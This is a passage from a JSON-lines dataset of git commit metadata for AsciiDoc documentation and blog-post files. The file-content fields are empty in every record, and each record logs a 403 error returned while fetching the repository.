ehouse\/elasticsearch,nezirus\/elasticsearch,jeteve\/elasticsearch,mapr\/elasticsearch,mcku\/elasticsearch,davidvgalbraith\/elasticsearch,NBSW\/elasticsearch,awislowski\/elasticsearch,fooljohnny\/elasticsearch,Shepard1212\/elasticsearch,gmarz\/elasticsearch,Kakakakakku\/elasticsearch,myelin\/elasticsearch,Liziyao\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,achow\/elasticsearch,ckclark\/elasticsearch,vvcephei\/elasticsearch,yongminxia\/elasticsearch,awislowski\/elasticsearch,Clairebi\/ElasticsearchClone,fernandozhu\/elasticsearch,YosuaMichael\/elasticsearch,Ansh90\/elasticsearch,scorpionvicky\/elasticsearch,andrejserafim\/elasticsearch,yongminxia\/elasticsearch,chrismwendt\/elasticsearch,nilabhsagar\/elasticsearch,rajanm\/elasticsearch,mbrukman\/elasticsearch,queirozfcom\/elasticsearch,SergVro\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,18098924759\/elasticsearch,mbrukman\/elasticsearch,huanzhong\/elasticsearch,pritishppai\/elasticsearch,strapdata\/elassandra-test,feiqitian\/elasticsearch,fubuki\/elasticsearch,andrestc\/elasticsearch,s1monw\/elasticsearch,lmenezes\/elasticsearch,YosuaMichael\/elasticsearch,zhaocloud\/elasticsearch,khiraiwa\/elasticsearch,abibell\/elasticsearch,lydonchandra\/elasticsearch,kubum\/elasticsearch,achow\/elasticsearch,lzo\/elasticsearch-1,Helen-Zhao\/elasticsearch,rento19962\/elasticsearch,Charlesdong\/elasticsearch,humandb\/elasticsearch,yanjunh\/elasticsearch,tahaemin\/elasticsearch,nrkkalyan\/elasticsearch,kingaj\/elasticsearch,kkirsche\/elasticsearch,iantruslove\/elasticsearch,naveenhooda2000\/elasticsearch,MetSystem\/elasticsearch,loconsolutions\/elasticsearch,Uiho\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,obourgain\/elasticsearch,smflorentino\/elasticsearch,socialrank\/elasticsearch,mm0\/elasticsearch,peschlowp\/elasticsearch,episerver\/elasticsearch,jsgao0\/elasticsearch,lydonchandra\/elasticsearch,sjohnr\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,robin13\/elasticsearch,kubum\/elasticsearch,kevinkluge\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,petabytedata\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,YosuaMichael\/elasticsearch,glefloch\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Ansh90\/elasticsearch,kalburgimanjunath\/elasticsearch,lzo\/elasticsearch-1,F0lha\/elasticsearch,franklanganke\/elasticsearch,snikch\/elasticsearch,nilabhsagar\/elasticsearch,alexkuk\/elasticsearch","old_file":"docs\/reference\/indices\/templates.asciidoc","new_file":"docs\/reference\/indices\/templates.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e26a07625e510fddf9da964d63ef0963ea808289","subject":"BVAL-508 Refinement of \"open questions\" section","message":"BVAL-508 Refinement of \"open questions\" section\n","repos":"beanvalidation\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,beanvalidation\/beanvalidation-spec,beanvalidation\/beanvalidation-spec","old_file":"sources\/appendix-value-extraction.asciidoc","new_file":"sources\/appendix-value-extraction.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beanvalidation\/beanvalidation-spec.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4448aa1db7465a975ec96d4b1da4903d74e4b62","subject":"(draft)","message":"(draft)\n","repos":"alexis-hassler\/blog,alexis-hassler\/blog","old_file":"_drafts\/2017-08-23-migration.adoc","new_file":"_drafts\/2017-08-23-migration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexis-hassler\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f0a8803b896d1de383bf6dcb8d9e84bdaa92cb1","subject":"Update 2016-01-28-Nuovo-post.adoc","message":"Update 2016-01-28-Nuovo-post.adoc","repos":"bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io","old_file":"_posts\/2016-01-28-Nuovo-post.adoc","new_file":"_posts\/2016-01-28-Nuovo-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bartoleo\/bartoleo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5319fe2616f2df6c7acdfcabd0750e58b541d2bf","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41c6f5031d8b70ddb75917638373edaca9a8cf3b","subject":"Update 2016-12-14-PresidentA.adoc","message":"Update 2016-12-14-PresidentA.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-12-14-PresidentA.adoc","new_file":"_posts\/2016-12-14-PresidentA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f2f8d8fd7eb02762996568f1cb455a1cc39fc73","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-uuid,sdavids\/sdavids-commons-uuid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-uuid.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba5d77b383334644d36cd35c2c4345d714e9eb35","subject":"\u6dfb\u52a0\u622a\u56fe\u6b23\u8d4f","message":"\u6dfb\u52a0\u622a\u56fe\u6b23\u8d4f\n\n","repos":"yiiu-co\/yiiu,yiiu-co\/yiiu,liygheart\/jfinalbbs,yiiu-co\/yiiu,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liygheart\/jfinalbbs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c547ed1a9ab908e37b9af5372dac3c7e840d3b95","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e8c2a6f2fa94079cc0c3c2daafc8ad277727b6c","subject":"y2b create post Samsung Gear S2 Hands On + Liquid Test","message":"y2b create post Samsung Gear S2 Hands On + Liquid Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-03-Samsung-Gear-S2-Hands-On--Liquid-Test.adoc","new_file":"_posts\/2015-09-03-Samsung-Gear-S2-Hands-On--Liquid-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"219d191e3900ca8eb2cabaaa2eca39f9ec21ece2","subject":"Update 2017-03-07-Part-1-Introducing-SP-A.adoc","message":"Update 2017-03-07-Part-1-Introducing-SP-A.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-03-07-Part-1-Introducing-SP-A.adoc","new_file":"_posts\/2017-03-07-Part-1-Introducing-SP-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6698e8067e932bda220052d1d9bc08060c5b3e8","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e11bd9a5e03a978a420eca3e5ea64cc116700ea4","subject":"Update 2015-05-27-Apache-24-PHP5-FPM-on-Debian8.adoc","message":"Update 2015-05-27-Apache-24-PHP5-FPM-on-Debian8.adoc","repos":"sanglt\/sanglt.github.io,sanglt\/sanglt.github.io,sanglt\/sanglt.github.io","old_file":"_posts\/2015-05-27-Apache-24-PHP5-FPM-on-Debian8.adoc","new_file":"_posts\/2015-05-27-Apache-24-PHP5-FPM-on-Debian8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sanglt\/sanglt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcf5b29d0eff64aa274db9f9fd001048dbf65079","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59a0f78c412488c7e470b96d4815300fbb949ec5","subject":"End course","message":"End course\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca8e1a96c1bc9f59bf5b0c4480639750cb267857","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37546e40351eea8a16c5da71a4b2a2a7a4c6b92a","subject":"Update 2015-02-27-Surprise-Madafaka.adoc","message":"Update 2015-02-27-Surprise-Madafaka.adoc","repos":"natsu90\/hubpress.io,natsu90\/hubpress.io,natsu90\/hubpress.io","old_file":"_posts\/2015-02-27-Surprise-Madafaka.adoc","new_file":"_posts\/2015-02-27-Surprise-Madafaka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/natsu90\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40939982d3c6614481925ceb6ab023eb1328296e","subject":"Update 2017-06-13-Episode-103-Focus.adoc","message":"Update 2017-06-13-Episode-103-Focus.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-13-Episode-103-Focus.adoc","new_file":"_posts\/2017-06-13-Episode-103-Focus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd927467f526ecf5bb795349eeaa4b19464b1bf3","subject":"Update 2016-08-31-Android-Update-Protocol.adoc","message":"Update 2016-08-31-Android-Update-Protocol.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-08-31-Android-Update-Protocol.adoc","new_file":"_posts\/2016-08-31-Android-Update-Protocol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38fa6c55ce2c78b5c6c45a773c5298280021a28f","subject":"Delete the file at '_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc'","message":"Delete the file at '_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ef4ef407161ce2c5e3d5a9c86fadfe8b7402f7e","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8406637fdd84ea6669cda51b4d665a53d026735c","subject":"Update 2015-09-21-Reusing-Classes.adoc","message":"Update 2015-09-21-Reusing-Classes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Reusing-Classes.adoc","new_file":"_posts\/2015-09-21-Reusing-Classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cddfe0e4b16098eddda61ff6045e2a91cf96cb6f","subject":"Update 2017-08-02-Killing-A-Tumor.adoc","message":"Update 2017-08-02-Killing-A-Tumor.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-08-02-Killing-A-Tumor.adoc","new_file":"_posts\/2017-08-02-Killing-A-Tumor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8826c075abdfc75e8eecb8ef5e17455cc99bc61b","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c919f0beeeead4ef682b01ad67a6d569ad9e7e28","subject":"Update 2017-04-05-FPM.adoc","message":"Update 2017-04-05-FPM.adoc","repos":"gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing","old_file":"_posts\/2017-04-05-FPM.adoc","new_file":"_posts\/2017-04-05-FPM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gogonkt\/makenothing.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"737d07b9a950a113d8ac9dc531f334351ca8b8b1","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"234a08216ea64a2e924cb2cb376a6b0ec17ecbdb","subject":"Update 2015-04-08-Test-Posting-1.adoc","message":"Update 2015-04-08-Test-Posting-1.adoc","repos":"abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io","old_file":"_posts\/2015-04-08-Test-Posting-1.adoc","new_file":"_posts\/2015-04-08-Test-Posting-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abien\/abien.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dee21779959bf3cf7066d8754bfda2f33ec7070","subject":"Update 2015-05-24-DevConfcz-2015.adoc","message":"Update 2015-05-24-DevConfcz-2015.adoc","repos":"OlgaMaciaszek\/olgamaciaszek.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,OlgaMaciaszek\/olgamaciaszek.github.io","old_file":"_posts\/2015-05-24-DevConfcz-2015.adoc","new_file":"_posts\/2015-05-24-DevConfcz-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OlgaMaciaszek\/olgamaciaszek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71b93c966a12b0eea05b9c7b7b42b7532cd421dc","subject":"Update 2017-03-03-C-S-S-triangle.adoc","message":"Update 2017-03-03-C-S-S-triangle.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"859864f9fd464dd79ea42ba27878b63c0a4df4f4","subject":"Update 2018-10-21-.adoc","message":"Update 2018-10-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-.adoc","new_file":"_posts\/2018-10-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdd897e58e6bcb5d881b08d15b84cbf77b2e1953","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58776c0a178fe5fcf0f6c96fb7fe7556581572f4","subject":"Works on doc","message":"Works on doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/ubf\/Bvstof.adoc","new_file":"doc\/api\/ubf\/Bvstof.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"bdb298bfb8c0e1930d0c33d0f5c3fd862e2980d6","subject":"Change ConfigurableDataProvider for ConfigurableFilterDataProvider (#9681)","message":"Change ConfigurableDataProvider for ConfigurableFilterDataProvider (#9681)\n\nIt says ConfigurableDataProvider, but there isn't a ConfigurableDataProvider class.","repos":"asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/datamodel\/datamodel-providers.asciidoc","new_file":"documentation\/datamodel\/datamodel-providers.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cc144e647a2b8204f6fd71739a568a0d72f69ffc","subject":"docs: update with requested changes","message":"docs: update with requested changes\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e363ae9b0c114e321b31bf34679988b12bbb1bd","subject":"doc(index): Replace Description","message":"doc(index): Replace Description\n","repos":"jsGiven\/jsGiven","old_file":"documentation\/index.adoc","new_file":"documentation\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsGiven\/jsGiven.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6a1a9f8da3387d33c8f73686885bc118ad340db","subject":"Update 2016-07-21-Sacrifice.adoc","message":"Update 2016-07-21-Sacrifice.adoc","repos":"gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io","old_file":"_posts\/2016-07-21-Sacrifice.adoc","new_file":"_posts\/2016-07-21-Sacrifice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gorjason\/gorjason.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eac0e92f934e6c1578089a1fe21f6c3146032c6a","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf5e2a7bcaf5ebe234098495a46ce4e01e63a6d6","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e801ed0fdab31caaaf681741944d902d53eda0c","subject":"Update 2015-05-20-Preparing-Multi-labelled-Image-dataset.adoc","message":"Update 2015-05-20-Preparing-Multi-labelled-Image-dataset.adoc","repos":"nikogamulin\/nikogamulin.github.io,nikogamulin\/nikogamulin.github.io,nikogamulin\/nikogamulin.github.io","old_file":"_posts\/2015-05-20-Preparing-Multi-labelled-Image-dataset.adoc","new_file":"_posts\/2015-05-20-Preparing-Multi-labelled-Image-dataset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nikogamulin\/nikogamulin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec9a697d2a0a19c40d1bd81a197b6a1b1eee61ca","subject":"doc: v2.37 update","message":"doc: v2.37 update\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"762f4692a7ee26917af30bbed8e933e9d1485fae","subject":"Update 2016-04-28-What-is-Functional-Programming.adoc","message":"Update 2016-04-28-What-is-Functional-Programming.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-04-28-What-is-Functional-Programming.adoc","new_file":"_posts\/2016-04-28-What-is-Functional-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3dcee76b5da87f8d10751e224ee69ac61b3bc0b","subject":"Adding a README for Linux","message":"Adding a README for Linux\n","repos":"cmrosenberg\/dotfiles","old_file":"linux\/README.asciidoc","new_file":"linux\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmrosenberg\/dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09c27843db54c012f3c023a38c74544aedac2019","subject":"Create do-code-block-fil.adoc","message":"Create do-code-block-fil.adoc\n\nFilipino translation for do-code-block.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-code-block-fil.adoc","new_file":"src\/do\/do-code-block-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dfc68fe8512dfe4d647163a89f53b26c6bf9aa0","subject":"break line in right place","message":"break line in right 